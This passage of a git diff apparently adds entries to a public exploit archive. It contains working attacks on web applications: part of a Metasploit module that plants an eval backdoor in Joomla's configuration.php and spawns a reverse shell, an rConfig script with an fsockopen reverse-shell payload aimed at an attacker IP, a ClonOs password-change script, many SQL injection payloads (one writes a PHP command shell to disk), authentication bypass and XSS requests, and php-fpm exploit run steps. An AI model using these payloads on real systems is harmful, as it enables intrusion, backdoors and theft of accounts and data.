+	    password_payload += 's:6:"return":s:102:' 				# close cleanly the object
+	    res = send_request_cgi({
+			'uri'	   => normalize_uri(target_uri.path,'/index.php/component/users'),
+			'method'   => 'POST',
+			'headers'  => 
+				{
+				'Cookie' => sess_token,
+			},
+			'vars_post' => {
+				'username' => username_payload,
+				'password' => password_payload,
+				'option'   => 'com_users',
+				'task'	   => 'user.login',
+				csrf_token => '1',
+			}
+	    }) 
+	    # Redirect in order to retrieve the output
+	    if res.redirection then
+		res_redirect = send_request_cgi({
+			'method' => 'GET',
+			'uri'	 => res.redirection.to_s,
+			'headers' =>{
+				'Cookie' => sess_token
+			}
+		})
+
+		if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
+			return true
+		else
+			return false
+		end
+		
+	    end
+    end
+
+  def check
+    # Check if the target is UP and get the current version running by info leak    
+    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
+    unless res
+      print_error("Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Parse XML to get the version 
+    if res.code == 200 then
+	    xml = res.get_xml_document
+	    version = xml.at('version').text
+	    print_status('Identified version ' + version)
+	    if version <= '3.4.6' and version >= '3.0.0' then
+		    if check_by_exploiting()
+			return Exploit::CheckCode::Vulnerable
+		    else
+			if check_by_exploiting() then
+			# Try the POC 2 times. 
+				return Exploit::CheckCode::Vulnerable
+			else
+				return Exploit::CheckCode::Safe
+			end
+		    end
+	    else
+		    return Exploit::CheckCode::Safe
+	    end
+    else
+	    print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
+	    if check_by_exploiting() then
+		    return Exploit::CheckCode::Vulnerable
+	    else
+		    if check_by_exploiting() then
+			return Exploit::CheckCode::Vulnerable
+		    else
+		    	return Exploit::CheckCode::Safe
+		    end
+	    end
+    end
+  end
+
+
+
+  
+  def exploit
+    if check == Exploit::CheckCode::Safe && !datastore['FORCE']
+      print_error('Target is not vulnerable')
+      return
+    end
+
+
+    pwned = false
+    cmd_param_name = get_random_string(50) 
+
+    sess_token = get_session_token()
+    csrf_token = get_csrf_token(sess_token)
+
+    # In order to avoid problems with disabled functions
+    # We are gonna append an eval() function at the end of the configuration.php file
+    # This will not cause any problem to Joomla and is a good way to execute then PHP directly
+    # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
+    # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
+    # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
+
+    # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
+    # 		Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
+
+    
+    # Implant the backdoor
+    vprint_status('Cooking the exploit ..')
+    username_payload = '\\0\\0\\0' * 9
+    password_payload = 'AAA";'						# close the prev object
+    password_payload += get_payload_backdoor(cmd_param_name)		# actual payload 
+    password_payload += 's:6:"return":s:102:' 				# close cleanly the object
+
+    print_status('Sending exploit ..')
+
+
+    res = send_request_cgi({
+		'uri'	   => normalize_uri(target_uri.path,'/index.php/component/users'),
+		'method'   => 'POST',
+		'headers'  => {
+			'Cookie' => sess_token
+		},
+		'vars_post' => {
+			'username' => username_payload,
+			'password' => password_payload,
+			'option'   => 'com_users',
+			'task'	   => 'user.login',
+			csrf_token => '1'
+		}
+    }) 
+
+    print_status('Triggering the exploit ..')    
+    if res.redirection then
+	res_redirect = send_request_cgi({
+		'method' => 'GET',
+		'uri'	 => res.redirection.to_s,
+		'headers' =>{
+			'Cookie' => sess_token
+		}
+	})
+    end
+
+    # Ping the backdoor see if everything is ok :/
+    res = send_request_cgi({
+		'method'     => 'POST',
+		'uri'	     => normalize_uri(target_uri.path,'configuration.php'),
+		'vars_post'  => {
+			cmd_param_name  => 'echo \'PWNED\';' 
+		}
+	})
+    if res.to_s.include? 'PWNED' then
+	print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
+
+        print_status('Now it\'s time to reverse shell')
+		res = send_request_cgi({
+		'method'     => 'POST',
+		'uri'	     => normalize_uri(target_uri.path,'configuration.php'),
+		'vars_post'  => {
+			cmd_param_name  => payload.encoded 
+		}
+	})
+    end
+
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47540.txt b/exploits/php/webapps/47540.txt
new file mode 100644
index 000000000..f682bee16
--- /dev/null
+++ b/exploits/php/webapps/47540.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection
+# Date: 2019-10-22
+# Exploit Author: Lucian Ioan Nitescu
+# Contact: https://twitter.com/LucianNitescu
+# Webiste: https://nitesculucian.github.io
+# Vendor Homepage: https://slicedinvoices.com/
+# Software Link: https://wordpress.org/plugins/sliced-invoices/
+# Version: 3.8.2
+# Tested on: Ubuntu 18.04 / Wordpress 5.3
+ 
+# 1. Description:  
+# Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected 
+# by an Authenticated SQL Injection vulnerability.
+
+# 2. Proof of Concept: 
+# Authenticated SQL Injection:
+- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
+- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
+- Sqlmap can be used to further exploit the vulnerability.
\ No newline at end of file
diff --git a/exploits/php/webapps/47544.py b/exploits/php/webapps/47544.py
new file mode 100755
index 000000000..cfe619513
--- /dev/null
+++ b/exploits/php/webapps/47544.py
@@ -0,0 +1,44 @@
+# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
+# Date: 2019-10-19
+# Exploit Author: İbrahim Hakan Şeker
+# Vendor Homepage: https://clonos.tekroutine.com/
+# Software Link: https://github.com/clonos/control-pane
+# Version: 19.09
+# Tested on: ClonOs
+# CVE : 2019-18418
+
+
+import requests
+from bs4 import BeautifulSoup
+import sys
+
+def getUser(host):
+    reg=r'\"'
+    r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
+    r1_source = BeautifulSoup(r1.content,"lxml")
+    for k in r1_source.findAll("tr"):
+        for i in k.findAll("td")[0]:
+            print(f"[+]User Found: {i}  User id: {k.get('id').replace(reg,'')}")
+def changePassword(host,user,password,id):
+    data={
+        "mode":"usersEdit",
+        "path":"/users/",
+        "hash":"",
+        "db_path":"",
+        "form_data[username]":f"{user}",
+        "form_data[password]":f"{password}",
+        "form_data[password1]":f"{password}",
+        "form_data[first_name]":"",
+        "form_data[last_name]":"",
+        "form_data[actuser]":"on",
+        "form_data[user_id]": int(id)
+        }
+    r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
+    if r2.status_code==200:print("[+]OK")
+    else:print("[-]Fail")
+if __name__=="__main__":
+    if len(sys.argv)>1:
+        if "getUser" in sys.argv[1]:getUser(sys.argv[2])
+        elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
+        else:print("Fail parameter")
+    else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")
\ No newline at end of file
diff --git a/exploits/php/webapps/47546.txt b/exploits/php/webapps/47546.txt
new file mode 100644
index 000000000..f5a4f755d
--- /dev/null
+++ b/exploits/php/webapps/47546.txt
@@ -0,0 +1,90 @@
+Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection
+Date: 2019-10-28
+Exploit Author: Cakes
+Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
+Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
+Version: 1.21
+Tested on: CentOS7
+CVE : N/A
+
+# PoC: Multiple SQL Injection vulnerabilities
+
+Parameter: start (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00
+    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Parameter: end (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi
+    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR
+    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Parameter: title (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND [INFERENCE]
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Parameter: description (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND [INFERENCE]
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+
+Parameter: color (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
+    Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00
+    Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
\ No newline at end of file
diff --git a/exploits/php/webapps/47547.txt b/exploits/php/webapps/47547.txt
new file mode 100644
index 000000000..2434ef334
--- /dev/null
+++ b/exploits/php/webapps/47547.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Part-DB 0.4 - Authentication Bypass
+# Date: 2019-10-26
+# Author: Marvoloo
+# Vendor Homepage: https://github.com/Part-DB/Part-DB/
+# Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip
+# Version: 0.4
+# Tested on: Linux
+# CVE : N/A
+
+# Discription:
+# Easy authentication bypass vulnerability on the application 
+# allowing the attacker to login
+
+# url: http://localhost/login.php
+# Parameter & Payload: 
+
+'=''or'
+
+#vulnerable file: login.php Line: 29,30 
+
+#POC
+POST /login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/login.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 24
+Cookie: ....
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
\ No newline at end of file
diff --git a/exploits/php/webapps/47548.txt b/exploits/php/webapps/47548.txt
new file mode 100644
index 000000000..8e3ce64e4
--- /dev/null
+++ b/exploits/php/webapps/47548.txt
@@ -0,0 +1,28 @@
+Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
+Date: 2019-10-28
+Exploit Author: Cakes
+Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
+Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
+Version: 1.21
+Tested on: CentOS7
+CVE : N/A
+
+# Description:
+# Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application.
+
+#POC
+POST /addEvent.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.0.0.20/calendar03/
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 213
+Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00
\ No newline at end of file
diff --git a/exploits/php/webapps/47550.txt b/exploits/php/webapps/47550.txt
new file mode 100644
index 000000000..f2cadd256
--- /dev/null
+++ b/exploits/php/webapps/47550.txt
@@ -0,0 +1,27 @@
+Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
+Date: 2019-10-28
+Exploit Author: Cakes
+Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
+Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
+Version: 1.32
+Tested on: CentOS7
+CVE : N/A
+
+# PoC: Multiple SQL Injection vulnerabilities
+# Nice and easy SQL Injection
+    
+Parameter: datetime (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
+    Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
+    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
+    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    
+  
+  
+# Pop a PHP CMD Shell
+  
+' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
\ No newline at end of file
diff --git a/exploits/php/webapps/47553.md b/exploits/php/webapps/47553.md
new file mode 100644
index 000000000..7997f116f
--- /dev/null
+++ b/exploits/php/webapps/47553.md
@@ -0,0 +1,79 @@
+# PHuiP-FPizdaM
+
+## What's this
+
+This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)).
+
+## What's vulnerable
+
+If a webserver runs nginx + php-fpm and nginx have a configuration like
+
+```
+location ~ [^/]\.php(/|$) {
+  ...
+  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
+  fastcgi_param PATH_INFO       $fastcgi_path_info;
+  fastcgi_pass   php:9000;
+  ...
+}
+```
+
+which also lacks any script existence checks (like `try_files`), then you can probably hack it with this sploit.
+
+#### The full list of preconditions
+1. Nginx + php-fpm, `location ~ [^/]\.php(/|$)` must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)).
+2. The `fastcgi_split_path_info` directive must be there and contain a regexp starting with `^` and ending with `$`, so we can break it with a newline character.
+3. There must be a `PATH_INFO` variable assignment via statement `fastcgi_param PATH_INFO $fastcgi_path_info;`. At first, we thought it is always present in the `fastcgi_params` file, but it's not true.
+4. No file existence checks like `try_files $uri =404` or `if (-f $uri)`. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch.
+5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)).
+
+## Isn't this known to be vulnerable for years?
+
+A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like `/avatar.png/some-fake-shit.php` could execute `avatar.png` as a PHP script. This issue was fixed around 2010.
+
+The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.
+
+## How to run
+
+Install it using
+```
+go get github.com/neex/phuip-fpizdam
+```
+
+If you get strange compilation errors, make sure you're using go >= 1.13. Run the program using `phuip-fpizdam [url]` (assuming you have the `$GOPATH/bin` inside your `$PATH`, otherwise specify the full path to the binary). Good output looks like this:
+
+```
+2019/10/01 02:46:15 Base status code is 200
+2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate
+2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
+2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect
+2019/10/01 02:46:16 Trying to set "session.auto_start=0"...
+2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS
+2019/10/01 02:46:16 Performing attack using php.ini settings...
+2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
+2019/10/01 02:46:40 Trying to cleanup /tmp/a...
+2019/10/01 02:46:40 Done!
+```
+
+After this, you can start appending `?a=<your command>` to all PHP scripts (you may need multiple retries).
+
+## Playground environment
+
+If you want to reproduce the issue or play with the exploit locally, do the following:
+
+1. Clone this repo and go to the `reproducer` directory.
+2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix.
+2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`.
+3. Now you have http://127.0.0.1:8080/script.php, which is an empty file.
+4. Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php`
+5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of php-fpm workers are infected.
+
+## About PHP5
+
+The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5.
+
+## Credits
+
+Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru).
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47553.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/47555.py b/exploits/php/webapps/47555.py
new file mode 100755
index 000000000..a3034e320
--- /dev/null
+++ b/exploits/php/webapps/47555.py
@@ -0,0 +1,47 @@
+# Exploit Title: rConfig 3.9.2 - Remote Code Execution
+# Date: 2019-09-18
+# Exploit Author: Askar
+# Vendor Homepage: https://rconfig.com/
+# Software link: https://rconfig.com/download
+# Version: v3.9.2
+# Tested on: CentOS 7.7 / PHP 7.2.22
+# CVE : CVE-2019-16662
+
+#!/usr/bin/python
+
+import requests
+import sys
+from urllib import quote
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+if len(sys.argv) != 4:
+    print "[+] Usage : ./exploit.py target ip port"
+    exit()
+
+target = sys.argv[1]
+
+ip = sys.argv[2]
+
+port = sys.argv[3]
+
+payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))
+
+install_path = target + "/install"
+
+req = requests.get(install_path, verify=False)
+if req.status_code == 404:
+    print "[-] Installation directory not found!"
+    print "[-] Exploitation failed !"
+    exit()
+elif req.status_code == 200:
+    print "[+] Installation directory found!"
+url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload
+
+print "[+] Triggering the payload"
+print "[+] Check your listener !"
+
+requests.get(url_to_send, verify=False)
+
+
+rConfig-preauth.png
\ No newline at end of file
diff --git a/exploits/php/webapps/47557.txt b/exploits/php/webapps/47557.txt
new file mode 100644
index 000000000..3a3492e74
--- /dev/null
+++ b/exploits/php/webapps/47557.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
+# Date: 2019-10-28
+# Exploit Author: Milad Khoshdel
+# Software Link: https://wordpress.org/download/
+# Version: Wordpress 5.2.4
+# Tested on: Linux Apache/2 PHP/7.2
+
+# Vulnerable Page:
+https://[Your-Domain]/wp-json
+
+# POC:
+# The web application fails to properly validate the Origin header (check Details section for more information) 
+# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue 
+# requests made with user credentials and read the responses to these requests. Trusting arbitrary 
+# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. 
+
+# REGUEST -->
+
+GET /wp-json/ HTTP/1.1
+Origin: https://www.evil.com
+Accept: */*
+Accept-Encoding: gzip,deflate
+Host: [Your-Domain]
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Connection: Keep-alive
+
+# RESPONSE -->
+
+HTTP/1.1 200 OK
+Date: Mon, 28 Oct 2019 07:34:39 GMT
+Server: NopeJS
+X-Robots-Tag: noindex
+Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
+X-Content-Type-Options: nosniff
+Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages
+Access-Control-Allow-Headers: Authorization, Content-Type
+Allow: GET
+Access-Control-Allow-Origin: https://www.evil.com
+Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
+Access-Control-Allow-Credentials: true
+Vary: Origin,Accept-Encoding,User-Agent
+Keep-Alive: timeout=2, max=73
+Connection: Keep-Alive
+Content-Type: application/json; charset=UTF-8
+Original-Content-Encoding: gzip
+Content-Length: 158412
\ No newline at end of file
diff --git a/exploits/php/webapps/47567.txt b/exploits/php/webapps/47567.txt
new file mode 100644
index 000000000..2b8b99468
--- /dev/null
+++ b/exploits/php/webapps/47567.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
+# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
+# Date: 2019-07-02
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
+# Version: 6.1
+# Tested on: Apache/2.2.24 (CentOS)
+# CVE : 
+
+#POC :
+
+GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
+&taction=edit HTTP/1.1
+
+#SQLMAP Result :
+sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
+---
+Parameter: tid (GET)
+Type: time-based blind
